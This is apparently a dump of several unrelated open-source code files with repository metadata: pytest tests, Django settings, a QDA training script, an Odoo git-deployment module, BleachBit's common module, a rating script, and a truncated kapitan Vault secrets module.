result = either_dict_or_kwargs(dict(a=1), dict(a=1), "foo")
@pytest.mark.parametrize(
["supplied", "all_", "expected"],
[
(list("abc"), list("abc"), list("abc")),
(["a", ..., "c"], list("abc"), list("abc")),
(["a", ...], list("abc"), list("abc")),
(["c", ...], list("abc"), list("cab")),
([..., "b"], list("abc"), list("acb")),
([...], list("abc"), list("abc")),
],
)
def test_infix_dims(supplied, all_, expected):
result = list(utils.infix_dims(supplied, all_))
assert result == expected
@pytest.mark.parametrize(
["supplied", "all_"], [([..., ...], list("abc")), ([...], list("aac"))]
)
def test_infix_dims_errors(supplied, all_):
with pytest.raises(ValueError):
list(utils.infix_dims(supplied, all_))
@pytest.mark.parametrize(
"nested_list, expected",
[
([], []),
([1], [1]),
([1, 2, 3], [1, 2, 3]),
([[1]], [1]),
([[1, 2], [3, 4]], [1, 2, 3, 4]),
([[[1, 2, 3], [4]], [5, 6]], [1, 2, 3, 4, 5, 6]),
],
)
def test_iterate_nested(nested_list, expected):
assert list(iterate_nested(nested_list)) == expected
|
apache-2.0
| 7,916,387,651,723,424,000
| 30.164179
| 88
| 0.582759
| false
| 3.128559
| true
| false
| false
|
tingcar/PSEP
|
src/PSEP/settings.py
|
1
|
3680
|
"""
Django settings for PSEP project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a9j_-kq$z8#r(8h4m)74l&&gspv%%e=!*(rnys6m^(c13aq%sn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#my apps
'contact',
'enbuckets',
'profiles',
'internalmail',
'events',
#tools
'south',
'registration',
'debug_toolbar',
'dajaxice',
'dajax',
)
ACCOUNT_ACTIVATION_DAYS = 7
REGISTRATION_OPEN = False
auth_password_reset = '/'
AUTH_PROFILE_MODULE = 'profiles.profile'
LOGIN_REDIRECT_URL = '/accounts/dashboard/'
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'PSEP.urls'
WSGI_APPLICATION = 'PSEP.wsgi.application'
######## DATABASE #########
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.core.context_processors.csrf',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'dajaxice.finders.DajaxiceFinder',
)
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# STATIC_URL = '/static/'
STATIC_URL = '/assets/'
MEDIA_URL='/media/'
#static
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','media')
STATIC_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','static-only')
STATICFILES_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','assets'),
)
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','templates'),
)
|
apache-2.0
| -5,925,759,729,754,591,000
| 22.144654
| 110
| 0.701087
| false
| 3.279857
| false
| false
| false
|
TakLee96/discriminant
|
train.py
|
1
|
2430
|
import numpy as np
from os import path
from scipy.io import loadmat
from timer import timer
from classifier import LDAClassifier, QDAClassifier
""" TODO: choose either mnist or spam >>HERE<< """
which = "spam.mat"
which = "mnist.mat"
""" TODO: choose either mnist or spam >>HERE<< """
timer.start("reading", which, "data from matlab file")
raw = loadmat(path.join(path.dirname(__file__), "data", which))
raw_data = raw['data']
raw_labl = raw['label'][0]
timer.end("done")
timer.start("permuting data randomly")
np.random.seed(0)
ordering = np.random.permutation(len(raw_data))
data = np.ndarray(shape=raw_data.shape, dtype=raw_data.dtype)
labl = np.ndarray(shape=raw_labl.shape, dtype=raw_labl.dtype)
for old, new in enumerate(ordering):
data[new] = raw_data[old]
labl[new] = raw_labl[old]
del raw, raw_data, raw_labl, ordering
timer.end("done")
def cross_validation(method, k=5):
if method == "lda":
Classifier = LDAClassifier
elif method == "qda":
Classifier = QDAClassifier
else:
raise Exception("lda or qda only")
timer.start("folding data into", k, "copies")
data_slice = [ None ] * k
labl_slice = [ None ] * k
train_rate = [ 0.0 ] * k
valid_rate = [ 0.0 ] * k
n = len(labl)
m = n / k
for i in range(k):
data_slice[i] = data[(i*m):min((i+1)*m,n)]
labl_slice[i] = labl[(i*m):min((i+1)*m,n)]
timer.end("done")
for j in range(k):
timer.start("validation iteration #", j)
training_data = np.concatenate(tuple(data_slice[i] for i in range(k) if i != j))
training_labl = np.concatenate(tuple(labl_slice[i] for i in range(k) if i != j))
print ".... data formating done"
        c = Classifier(training_data, training_labl)
print ".... classifier training done"
train_rate[j] = c.score(c.classify_all(training_data), training_labl)
print ".... training accuracy computation done"
valid_rate[j] = c.score(c.classify_all(data_slice[j]), labl_slice[j])
print ".... validation accuracy computation done"
timer.end("done; training accuracy =", train_rate[j], "; validation accuracy =", valid_rate[j])
print k, "fold cross validation for", method, "on dataset", which, "complete"
print ".... overall training accuracy =", np.mean(train_rate)
print ".... overall validation accuracy =", np.mean(valid_rate)
cross_validation("qda")
|
mit
| -644,527,991,301,725,700
| 33.714286
| 103
| 0.634979
| false
| 3.164063
| false
| false
| false
|
marcoscrcamargo/ic
|
results.py
|
1
|
2191
|
import csv
import time
fieldnames = ['class', 'knn_hst', 'hst_pxl', 'mlp_hst', 'mlp_pxl', 'svm_hst', 'svm_pxl', 'ensemble_hst', 'ensemble_pxl', 'ensemble_all']
writer = None
file = 'results_' + str(time.ctime()) +'.csv'
def initializate(fname=file):
global writer
global file
file = fname
with open(fname, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
def write_row(label, knn_hst, hst_pxl, mlp_hst, mlp_pxl, svm_hst, svm_pxl, ensemble_hst, ensemble_pxl, ensemble_all):
global writer
with open(file, 'a') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({ fieldnames[0]: label,
fieldnames[1]: knn_hst,
fieldnames[2]: hst_pxl,
fieldnames[3]: mlp_hst,
fieldnames[4]: mlp_pxl,
fieldnames[5]: svm_hst,
fieldnames[6]: svm_pxl,
fieldnames[7]: ensemble_hst,
fieldnames[8]: ensemble_pxl,
fieldnames[9]: ensemble_all})
def main():
initializate()
write_row('e', '1', '2', '0', '1', '2', '0', '1', '0', '2')
# write_csv = {'class':'none',
# 'knn_hst': str(knn_ret['hst']['label']) + '_' + str(knn_ret['hst'][str(knn_ret['hst']['label'])]),
# 'hst_pxl': str(knn_ret['pxl']['label']) + '_' + str(knn_ret['pxl'][str(knn_ret['pxl']['label'])]),
# 'mlp_hst': str(mlp_ret['hst']['label']) + '_' + str(mlp_ret['hst'][str(mlp_ret['hst']['label'])]),
# 'mlp_pxl': str(mlp_ret['pxl']['label']) + '_' + str(mlp_ret['pxl'][str(mlp_ret['pxl']['label'])]),
# 'svm_hst': str(svm_ret['hst']['label']) + '_' + str(svm_ret['hst'][str(svm_ret['hst']['label'])]),
# 'svm_pxl': str(svm_ret['pxl']['label']) + '_' + str(svm_ret['pxl'][str(svm_ret['pxl']['label'])]),
# 'ensemble_hst': str(hst_c['label']) + '_' + str(hst_c[str(hst_c['label'])]),
# 'ensemble_pxl': str(pxl_c['label']) + '_' + str(pxl_c[str(pxl_c['label'])]),
# 'ensemble_all': str(all_c['label']) + '_' + str(all_c[str(all_c['label'])])}
if __name__ == "__main__":
main()
|
gpl-3.0
| 6,560,752,996,770,302,000
| 41.980392
| 136
| 0.524418
| false
| 2.633413
| false
| false
| false
|
lisogallo/odoo-it-infra
|
it_infrastructure/server_repository.py
|
1
|
2915
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api, _
from openerp.exceptions import except_orm
from fabric.api import cd, sudo, settings
from fabric.contrib.files import exists
import os
class server_repository(models.Model):
""""""
_name = 'it_infrastructure.server_repository'
_description = 'server_repository'
_rec_name = 'repository_id'
repository_id = fields.Many2one(
'it_infrastructure.repository',
string='Repository',
required=True
)
path = fields.Char(
string='Path'
)
server_id = fields.Many2one(
'it_infrastructure.server',
string='server_id',
ondelete='cascade',
required=True
)
@api.one
def get_repository(self):
print 'Getting repository'
self.path = self.repository_id.get_repository(self.server_id)[0]
@api.one
def update_repository(self, path=False):
print 'Updating repository'
self.server_id.get_env()
if not path:
path = self.path
if not path or not exists(path, use_sudo=True):
# raise except_orm(
# _('No Repository Folder!'),
# _("Please check that the especified path '%s' exists \
# in order to download for first time!") % path
# )
cmd = 'git clone %s %s' % (self.repository_id.url, path)
try:
# sudo(cmd, user=self.server_id.user_name, group='odoo')
sudo(cmd, user='odoo', group='odoo')
except SystemExit, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Unknown system error')
)
else:
cmd = 'git pull'
with cd(path.strip()):
try:
sudo(cmd)
except Exception, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Command output: %s') % e
)
except SystemExit, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Unknown system error')
)
@api.one
def get_update_repository(self):
self.server_id.get_env()
if not self.path:
# Check if repository on path
path = os.path.join(
self.server_id.sources_path, self.repository_id.directory)
if exists(path, use_sudo=True):
                # the repository apparently already exists; try to update it
self.update_repository(path)
self.path = path
else:
self.get_repository()
else:
self.update_repository()
return True
|
agpl-3.0
| -4,230,107,899,597,576,000
| 31.032967
| 74
| 0.50223
| false
| 4.31213
| false
| false
| false
|
FabianWe/csd-freiburg-forms
|
csd_freiburg_forms/donate_o_meter/donate_o_meter.py
|
1
|
2011
|
# Copyright (C) 2016 Fabian Wenzelmann
#
# This file is part of csd-freiburg-forms.
#
# csd-freiburg-forms is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# csd-freiburg-forms is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with csd-freiburg-forms. If not, see <http://www.gnu.org/licenses/>.
#
from PIL import Image
class DonateOMeter:
def __init__(self, background, filling, aim, box=None):
self.background = background
self.filling = filling
self.aim = aim
if box is None:
width, height = background.size
box = (0, 0, width - 1, height - 1)
self.box = box
def draw(self, current):
box = self.box
        # compute the fill fraction; the empty/full edge cases are handled below
percent = current / self.aim
width, height = self.background.size
mh = box[3] - box[1]
ch = int(mh * percent)
# first check if ch is zero, in this case return the background
if ch <= 0:
return self.background.copy()
# check if ch is the height of the box, in this case return
# the filling
if ch >= (box[3] - box[1]):
return self.filling.copy()
img = self.background.copy()
crop_left = box[0]
crop_upper = box[3] - ch
crop_right = box[2]
crop_lower = box[3]
# crop the designated area from the image
meter_area = self.filling.crop(
(crop_left, crop_upper, crop_right, crop_lower))
img.paste(meter_area, (crop_left, crop_upper))
return img
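# Hedged usage sketch (an addition, not part of the original module): the
# solid-colour placeholder images stand in for real meter artwork so the
# example is self-contained; the output file name is illustrative.
if __name__ == '__main__':
    empty = Image.new('RGB', (100, 300), 'white')
    full = Image.new('RGB', (100, 300), 'red')
    meter = DonateOMeter(empty, full, aim=1000)
    # 250 of 1000 -> the lower quarter of `full` is pasted over `empty`
    meter.draw(250).save('meter_25_percent.png')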
|
gpl-3.0
| -3,033,785,776,946,643,500
| 33.672414
| 79
| 0.632521
| false
| 3.744879
| false
| false
| false
|
maximilianofaccone/puppy-siberian
|
usr/share/bleachbit/Common.py
|
1
|
7633
|
# vim: ts=4:sw=4:expandtab
# -*- coding: UTF-8 -*-
# BleachBit
# Copyright (C) 2014 Andrew Ziem
# http://bleachbit.sourceforge.net
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Code that is commonly shared throughout BleachBit
"""
import gettext
import locale
import os
import sys
import traceback
if 'nt' == os.name:
from win32com.shell import shell, shellcon
APP_VERSION = "1.2"
APP_NAME = "BleachBit"
APP_URL = "http://bleachbit.sourceforge.net"
print "info: starting %s version %s" % (APP_NAME, APP_VERSION)
socket_timeout = 10
# Setting below value to false disables update notification (useful
# for packages in repositories).
online_update_notification_enabled = True
#
# Paths
#
# Windows
bleachbit_exe_path = None
if hasattr(sys, 'frozen'):
# running frozen in py2exe
bleachbit_exe_path = os.path.dirname(
unicode(sys.executable, sys.getfilesystemencoding()))
else:
# __file__ is absolute path to bleachbit/Common.py
bleachbit_exe_path = os.path.dirname(
unicode(__file__, sys.getfilesystemencoding()))
# license
license_filename = None
license_filenames = ('/usr/share/common-licenses/GPL-3', # Debian, Ubuntu
os.path.join(
bleachbit_exe_path, 'COPYING'), # Microsoft Windows
'/usr/share/doc/bleachbit-' + APP_VERSION +
'/COPYING', # CentOS, Fedora, RHEL
'/usr/share/doc/packages/bleachbit/COPYING',
# OpenSUSE 11.1
'/usr/share/doc/bleachbit/COPYING', # Mandriva
'/usr/pkg/share/doc/bleachbit/COPYING', # NetBSD 5
'/usr/share/licenses/common/GPL3/license.txt') # Arch Linux
for lf in license_filenames:
if os.path.exists(lf):
license_filename = lf
break
# configuration
portable_mode = False
options_dir = None
if 'posix' == os.name:
options_dir = os.path.expanduser("~/.config/bleachbit")
elif 'nt' == os.name:
if os.path.exists(os.path.join(bleachbit_exe_path, 'bleachbit.ini')):
# portable mode
portable_mode = True
options_dir = bleachbit_exe_path
else:
# installed mode
options_dir = os.path.expandvars("${APPDATA}\\BleachBit")
options_file = os.path.join(options_dir, "bleachbit.ini")
# personal cleaners
personal_cleaners_dir = os.path.join(options_dir, "cleaners")
# system cleaners
if sys.platform.startswith('linux'):
system_cleaners_dir = '/usr/share/bleachbit/cleaners'
elif sys.platform == 'win32':
system_cleaners_dir = os.path.join(bleachbit_exe_path, 'share\\cleaners\\')
elif sys.platform[:6] == 'netbsd':
system_cleaners_dir = '/usr/pkg/share/bleachbit/cleaners'
else:
system_cleaners_dir = None
print 'warning: unknown system cleaners directory for platform ', sys.platform
# local cleaners directory (for running from source tree)
local_cleaners_dir = os.path.normpath(
os.path.join(bleachbit_exe_path, '../cleaners'))
# application icon
__icons = ('/usr/share/pixmaps/bleachbit.png', # Linux
os.path.join(bleachbit_exe_path, 'share\\bleachbit.png'), # Windows
'/usr/pkg/share/pixmaps/bleachbit.png', # NetBSD
os.path.normpath(os.path.join(bleachbit_exe_path, '../bleachbit.png'))) # local
appicon_path = None
for __icon in __icons:
if os.path.exists(__icon):
appicon_path = __icon
# locale directory
if os.path.exists("./locale/"):
# local locale (personal)
locale_dir = os.path.abspath("./locale/")
else:
# system-wide installed locale
if sys.platform.startswith('linux'):
locale_dir = "/usr/share/locale/"
elif sys.platform == 'win32':
locale_dir = os.path.join(bleachbit_exe_path, 'share\\locale\\')
elif sys.platform[:6] == 'netbsd':
locale_dir = "/usr/pkg/share/locale/"
# launcher
launcher_path = '/usr/share/applications/bleachbit.desktop'
if 'posix' == os.name:
autostart_path = os.path.expanduser(
'~/.config/autostart/bleachbit.desktop')
#
# setup environment
#
# Windows XP doesn't define localappdata, but Windows Vista and 7 do
def environ(varname, csidl):
try:
os.environ[varname] = shell.SHGetSpecialFolderPath(None, csidl)
except:
traceback.print_exc()
        msg = 'Error setting environment variable "%s": %s' % (
            varname, str(sys.exc_info()[1]))
import GuiBasic
GuiBasic.message_dialog(None, msg)
if 'nt' == os.name:
environ('localappdata', shellcon.CSIDL_LOCAL_APPDATA)
environ('documents', shellcon.CSIDL_DESKTOPDIRECTORY)
#
# gettext
#
try:
user_locale = locale.getdefaultlocale()[0]
except:
print 'warning: error getting locale: %s' % str(sys.exc_info()[1])
user_locale = None
if user_locale is None:
user_locale = 'C'
print "warning: No default locale found. Assuming '%s'" % user_locale
if 'win32' == sys.platform:
os.environ['LANG'] = user_locale
try:
if not os.path.exists(locale_dir):
raise RuntimeError('translations not installed')
t = gettext.translation('bleachbit', locale_dir)
_ = t.ugettext
except:
def _(msg):
"""Dummy replacement for ugettext"""
return msg
try:
ungettext = t.ungettext
except:
def ungettext(singular, plural, n):
"""Dummy replacement for Unicode, plural gettext"""
if 1 == n:
return singular
return plural
#
# pgettext
#
# Code released in the Public Domain. You can do whatever you want with this package.
# Originally written by Pierre Métras <pierre@alterna.tv> for the OLPC XO laptop.
#
# Original source: http://dev.laptop.org/git/activities/clock/plain/pgettext.py
# pgettext(msgctxt, msgid) from gettext is not supported in Python implementation < v2.6.
# http://bugs.python.org/issue2504
# Meanwhile we get official support, we have to simulate it.
# See http://www.gnu.org/software/gettext/manual/gettext.html#Ambiguities for
# more information about pgettext.
# The separator between message context and message id.This value is the same as
# the one used in gettext.h, so PO files should be still valid when Python gettext
# module will include pgettext() function.
GETTEXT_CONTEXT_GLUE = "\004"
def pgettext(msgctxt, msgid):
"""A custom implementation of GNU pgettext().
"""
    if msgctxt is not None and msgctxt != "":
translation = _(msgctxt + GETTEXT_CONTEXT_GLUE + msgid)
if translation.startswith(msgctxt + GETTEXT_CONTEXT_GLUE):
return msgid
else:
return translation
else:
return _(msgid)
# Map our pgettext() custom function to _p()
_p = lambda msgctxt, msgid: pgettext(msgctxt, msgid)
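# Hedged usage sketch (an addition): _p() disambiguates a short msgid via a
# context; the 'verb' context below is illustrative, real contexts come from
# the BleachBit PO files.
#   label = _p('verb', 'Open')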
#
# URLs
#
base_url = "http://bleachbit.sourceforge.net"
help_contents_url = "%s/link.php?version=%s&lang=%s&target=help" \
% (base_url, APP_VERSION, user_locale)
release_notes_url = "%s/link.php?version=%s&lang=%s&target=release_notes" \
% (base_url, APP_VERSION, user_locale)
update_check_url = "%s/communicate.php" % base_url
|
gpl-3.0
| 3,201,493,757,747,861,000
| 29.898785
| 91
| 0.666798
| false
| 3.414765
| false
| false
| false
|
lucabaldini/rating02
|
dump_rating.py
|
1
|
7983
|
#!/usr/bin/env python
#
# Copyright (C) 2019, Luca Baldini.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import numpy
import matplotlib.pyplot as plt
from rating import *
import _rating2020 as _rating
def filter_db_pers(db_pers):
"""This is filtering a DocentDatabse object removing all the persons with
less than 2 products (which automatically get 0 rating points).
Note that, for the thing to work, this has to be called after a loop
over the db where the product statistics has been calculated and
updated.
"""
db = DocentDatabase()
for pers in db_pers:
if pers.num_products >= 2:
db.append(pers)
else:
print('Filtering out %s (%d products)...' %\
(pers.full_name, pers.num_products))
return db
def dump_rating(file_path, collab_threshold=30):
"""Dump the full rating information.
"""
# Load the underlying database objects.
db_prod = load_db_prod()
db_pers = load_db_pers()
sub_areas = sorted(Product.SUB_AREA_DICT.keys())
# First loop over the products, where we mark the invalid as such, and
# we manually set the journal impact factor where necessary.
print('Post-processing product list...')
for prod in db_prod:
# Mark invalids.
if prod.row_index in _rating.INVALID:
print('Marking product @ row %d for %s as invalid...' %\
(prod.row_index, prod.author_surname))
prod.valid = False
# Set impact factor if necessary.
if prod.pub_type == '1.1 Articolo in rivista' and \
prod.impact_factor() is None and \
prod.journal in _rating.IMPACT_FACTOR_DICT.keys():
journal = prod.journal
impact_factor = _rating.IMPACT_FACTOR_DICT[journal]
print('Setting IF for %s @ row %d to %.3f...' %\
(journal, prod.row_index, impact_factor))
prod.set_impact_factor(impact_factor)
# Break out the docent database into the three sub-areas.
    # Mind that at this point the sub-lists still contain the persons with
    # less than 2 products.
print('Populating sub-areas...')
pers_dict = {}
for sub_area in sub_areas:
pers_dict[sub_area] = db_pers.select(sub_area=sub_area)
# Actual loop to calculate the rating points and the basic product
# statistics for all the docents.
print('Calculating rating points...')
for sub_area in sub_areas:
for pers in pers_dict[sub_area]:
prods = db_prod.select(author_full_name=pers.full_name, valid=True)
pers.num_products = len(prods)
if len(prods) == 0:
continue
rating = sum(prod.rating_points(sub_area, _rating.RATING_DICT) for\
prod in prods)
# Take any leave of absence into account.
if pers.full_name in _rating.LOA_SCALING_DICT:
scale = _rating.LOA_SCALING_DICT[pers.full_name]
print('Scaling rating for %s by %.3f' % (pers.full_name, scale))
rating *= scale
num_authors = numpy.array([prod.num_authors for prod in prods])
# Update the Docent object.
pers.rating = rating
# Note that we're casting all the numpy scalars to native Python
# types for the excel interface module to be able to write them in
# the output file.
pers.num_collab_products = \
int((num_authors > collab_threshold).sum())
pers.min_num_authors = int(num_authors.min())
pers.median_num_authors = float(numpy.median(num_authors))
pers.max_num_authors = int(num_authors.max())
# Now that we have the basic product statistics we can filter out
# the docents with less than 2 products.
for sub_area in sub_areas:
        print('Filtering docent database for sub-area %s...' % sub_area)
pers_dict[sub_area] = filter_db_pers(pers_dict[sub_area])
# Sort the docents and dump the excel file.
print('Sorting docents within sub-areas...')
table = ExcelTableDump()
col_names = ['Ranking', 'Nome', 'Punti rating', 'Numero prodotti',
'Numero prodotti con > %d autori' % collab_threshold,
'# autori min', '# autori medio', '# autori max']
for sub_area in sub_areas:
rows = []
pers_dict[sub_area].sort(reverse=True)
print('Ratings points for sub-area %s:' % sub_area)
for i, pers in enumerate(pers_dict[sub_area]):
pers.ranking = i
print('%2i -- %s: %f rating points.' %\
(i, pers.full_name, pers.rating))
rows.append([i, pers.full_name, pers.rating, pers.num_products,
pers.num_collab_products, pers.min_num_authors,
pers.median_num_authors, pers.max_num_authors])
table.add_worksheet('Sottoarea %s' % sub_area, col_names, rows)
table.write(file_path)
# Do some plotting.
for sub_area in sub_areas:
plt.figure('Sottoarea %s' % sub_area, figsize=(12, 8))
num_persons = len(pers_dict[sub_area])
num_points = _rating.RATING_POINTS_PER_DOCENT * num_persons
plt.title('Sottoarea %s (%d docenti, %.3f punti)' %\
(sub_area, num_persons, num_points), size=18)
ranking = numpy.array([pers.ranking for pers in pers_dict[sub_area]])
rating = numpy.array([pers.rating for pers in pers_dict[sub_area]])
plt.plot(ranking, rating, 'o')
plt.xlabel('Ranking')
plt.ylabel('Rating points')
for pers in pers_dict[sub_area]:
x = pers.ranking
y = pers.rating
name = pers.full_name.split()[0].title()
if name in ['Di', 'Del', 'Prada']:
name += ' %s' % pers.full_name.split()[1].title()
txt = '%s, %d (%d) <%.1f>' %\
(name, pers.num_products, pers.num_collab_products,
pers.median_num_authors)
plt.text(x, y, txt, rotation=20., ha='left', va='bottom')
leg = 'Cognome, # prod (# prod > %d auth) <median # auth>' %\
(collab_threshold)
plt.text(0.5, 0.9, leg, transform=plt.gca().transAxes, size=12)
# Calculate the quantiles.
print('Calculating quantiles for sub-area %s...' % sub_area)
quantiles = numpy.floor(numpy.linspace(0.22, 0.75, 3) * num_persons)
quantiles += 0.5
for q in quantiles:
plt.axvline(q, ls='dashed')
quantiles = numpy.concatenate(([-0.5], quantiles, [num_persons + 0.5]))
psum = 0
for i, (q1, q2) in enumerate(zip(quantiles[:-1], quantiles[1:])):
mask = (ranking > q1) * (ranking < q2)
r = ranking[mask]
n = len(r)
frac = float(n) / num_persons
p = 4 - i
psum += p * n
print('%d docents with %d points...' % (n, p))
plt.text(r.mean(), 2, '%d x %d = %d (%.1f %%)' %\
(p, n, n * p, 100. * frac), ha='center')
print('Total rating points for area %s: %d' % (sub_area, psum))
plt.savefig('rating02_2020_%s.png' % sub_area)
plt.show()
if __name__ == '__main__':
dump_rating('rating02_2020.xls')
|
gpl-3.0
| 4,332,046,184,173,600,300
| 41.68984
| 80
| 0.591131
| false
| 3.555902
| false
| false
| false
|
ademariag/kapitan
|
kapitan/refs/secrets/vaultkv.py
|
2
|
9041
|
# Copyright 2019 The Kapitan Authors
# SPDX-FileCopyrightText: 2020 The Kapitan Authors <kapitan-admins@googlegroups.com>
#
# SPDX-License-Identifier: Apache-2.0
"hashicorp vault kv secrets module"
import base64
import logging
import os
from binascii import Error as b_error
from sys import exit
from kapitan import cached
from kapitan.errors import KapitanError
from kapitan.refs.base import RefError
from kapitan.refs.base64 import Base64Ref, Base64RefBackend
import hvac
from hvac.exceptions import Forbidden, InvalidPath
logger = logging.getLogger(__name__)
class VaultError(KapitanError):
"""Generic vault errors"""
pass
def get_env(parameter):
"""
The following variables need to be exported to the environment or defined in inventory.
* VAULT_ADDR: url for vault
* VAULT_SKIP_VERIFY=true: if set, do not verify presented TLS certificate before communicating with Vault server.
* VAULT_CLIENT_KEY: path to an unencrypted PEM-encoded private key matching the client certificate
* VAULT_CLIENT_CERT: path to a PEM-encoded client certificate for TLS authentication to the Vault server
* VAULT_CACERT: path to a PEM-encoded CA cert file to use to verify the Vault server TLS certificate
* VAULT_CAPATH: path to a directory of PEM-encoded CA cert files to verify the Vault server TLS certificate
* VAULT_NAMESPACE: specify the Vault Namespace, if you have one
    Following keys are used to create a new hvac client instance.
:param url: Base URL for the Vault instance being addressed.
:type url: str
:param cert: Certificates for use in requests sent to the Vault instance. This should be a tuple with the
certificate and then key.
:type cert: tuple
:param verify: Either a boolean to indicate whether TLS verification should be performed when sending requests to Vault,
or a string pointing at the CA bundle to use for verification.
See http://docs.python-requests.org/en/master/user/advanced/#ssl-cert-verification.
:type verify: Union[bool,str]
:param namespace: Optional Vault Namespace.
:type namespace: str
"""
client_parameters = {}
client_parameters["url"] = parameter.get("VAULT_ADDR", os.getenv("VAULT_ADDR", default=""))
client_parameters["namespace"] = parameter.get(
"VAULT_NAMESPACE", os.getenv("VAULT_NAMESPACE", default="")
)
# VERIFY VAULT SERVER TLS CERTIFICATE
skip_verify = str(parameter.get("VAULT_SKIP_VERIFY", os.getenv("VAULT_SKIP_VERIFY", default="")))
if skip_verify.lower() == "false":
cert = parameter.get("VAULT_CACERT", os.getenv("VAULT_CACERT", default=""))
if not cert:
cert_path = parameter.get("VAULT_CAPATH", os.getenv("VAULT_CAPATH", default=""))
if not cert_path:
raise Exception("Neither VAULT_CACERT nor VAULT_CAPATH specified")
client_parameters["verify"] = cert_path
else:
client_parameters["verify"] = cert
else:
client_parameters["verify"] = False
# CLIENT CERTIFICATE FOR TLS AUTHENTICATION
client_key = parameter.get("VAULT_CLIENT_KEY", os.getenv("VAULT_CLIENT_KEY", default=""))
client_cert = parameter.get("VAULT_CLIENT_CERT", os.getenv("VAULT_CLIENT_CERT", default=""))
if client_key != "" and client_cert != "":
client_parameters["cert"] = (client_cert, client_key)
return client_parameters
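# Hedged usage sketch (the address is illustrative, not a real deployment):
#   get_env({'VAULT_ADDR': 'https://vault.example.com:8200',
#            'VAULT_SKIP_VERIFY': 'true'})
#   # -> {'url': 'https://vault.example.com:8200', 'namespace': '',
#   #     'verify': False}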
def vault_obj(vault_parameters):
"""
vault_parameters: necessary parameters to authenticate & get value from vault, provided by inventory
e.g.:
auth: userpass
VAULT_ADDR: http://127.0.0.1:8200
VAULT_SKIP_VERIFY: false
Authenticate client to server and return client object
"""
env = get_env(vault_parameters)
client = hvac.Client(**{k: v for k, v in env.items() if k != "auth"})
auth_type = vault_parameters["auth"]
    # GET TOKEN EITHER FROM ENVIRONMENT OR FILE
if auth_type in ["token", "github"]:
env["token"] = os.getenv("VAULT_TOKEN")
if not env["token"]:
try:
token_file = os.path.join(os.path.expanduser("~"), ".vault-token")
with open(token_file, "r") as f:
env["token"] = f.read()
if env["token"] == "":
raise VaultError("{file} is empty".format(file=token_file))
except IOError:
raise VaultError("Cannot read file {file}".format(file=token_file))
# DIFFERENT LOGIN METHOD BASED ON AUTHENTICATION TYPE
if auth_type == "token":
client.token = env["token"]
elif auth_type == "ldap":
